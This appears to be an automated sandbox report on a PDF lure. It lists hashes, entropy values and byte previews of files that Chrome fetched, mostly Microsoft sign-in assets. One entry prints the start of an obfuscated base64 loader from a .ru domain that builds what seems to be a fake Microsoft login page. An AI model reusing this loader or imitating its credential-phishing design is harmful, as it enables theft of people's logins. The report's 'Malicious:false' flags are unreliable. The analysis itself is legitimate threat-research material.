                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:downloaded
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:dropped
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 56 x 87, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.068159130770306
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPl/IzIjlpBxl/k4E08up:6v/lhPOMjTB7Tp
                                                                MD5:C3E9ABEBD8C535B8DB9A61E5ABCDA1F1
                                                                SHA1:DA9A075B532D8B79D7B101A8B0A5E59B5CC729C1
                                                                SHA-256:C7516350FC5247A62AAA1E5594A96194226AED2B6E356CE4372E5D7800B4761E
                                                                SHA-512:7F71ED2371D52495C6ACC69DE846D5128B9EFFA73731593F5F0B3A8EB0563E93A01E1BA13D5B3552D5DC90CF3F43E5F7428F830E257833815A7B2E71D85EEFAC
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...8...W......F......IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                Category:downloaded
                                                                Size (bytes):20410
                                                                Entropy (8bit):7.980582012022051
                                                                Encrypted:false
                                                                SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                Category:dropped
                                                                Size (bytes):5525
                                                                Entropy (8bit):7.961202222662501
                                                                Encrypted:false
                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                Malicious:false
                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                Category:downloaded
                                                                Size (bytes):35170
                                                                Entropy (8bit):7.993096534744333
                                                                Encrypted:true
                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                Category:downloaded
                                                                Size (bytes):16345
                                                                Entropy (8bit):7.98960525258912
                                                                Encrypted:false
                                                                SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (7513), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):19728
                                                                Entropy (8bit):5.862940767136979
                                                                Encrypted:false
                                                                SSDEEP:384:QnuutwAnCJDVvAyvjlA7SkjCjlnuutwAnCJDVv3lrjlryGz:ujAXjA/lrjlrpz
                                                                MD5:D2D8B377168BFA393F2A143E80B956FE
                                                                SHA1:286873E8DF310CCC6E2F60B5EFAD3816D3B5A92D
                                                                SHA-256:DFACCA51186D73248FAEAF5BE0F9189906A6B81286B53F35DA6C50DA0EACB678
                                                                SHA-512:BF6593A33B5F1601D8315ADA7E1EC453649BCB081148F44EC41CDED5152669621AA2B3052DDD1243F95D8797D517FEE6AA170C6871FC44AB550ED830157157EA
                                                                Malicious:false
                                                                URL:https://sung.ethamoskag.ru/0cUrcw3/
                                                                Preview:<script>....if(atob("aHR0cHM6Ly92Vi5ldGhhbW9za2FnLnJ1LzBjVXJjdzMv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNmWk5kU2FtUkhsIGg0e21hcmdpb
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:dropped
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                Category:dropped
                                                                Size (bytes):17174
                                                                Entropy (8bit):2.9129715116732746
                                                                Encrypted:false
                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                Malicious:false
                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                Category:dropped
                                                                Size (bytes):116343
                                                                Entropy (8bit):7.997640489040715
                                                                Encrypted:true
                                                                SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                Malicious:false
                                                                Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                File type:PDF document, version 1.4, 3 pages
                                                                Entropy (8bit):7.935711327408253
                                                                TrID:
                                                                • Adobe Portable Document Format (5005/1) 100.00%
                                                                File name:Sburkholder.pdf
                                                                File size:215'833 bytes
                                                                MD5:b3a3d7744a0c02cd48e73ce53e940cae
                                                                SHA1:16c7c792a7f9d6e762bbd889b1ce4a8f1c78177a
                                                                SHA256:e38743b9f792a39181c5549336760d980af96a3534a782db872948e97a21651e
                                                                SHA512:765c0b25e5f4697d231eb2d196510e5100980f35cb6ba8b0e820f34a56ff91047b8f83108691ddb180fe6194f4b34f523f15bb6bf9411745bfed08eae1f33bd8
                                                                SSDEEP:6144:oUsiWCl5N/XfQfMdVVUJiCJgwxh7QA5P/KoT1:RNNXQx8ygwxJV/K0
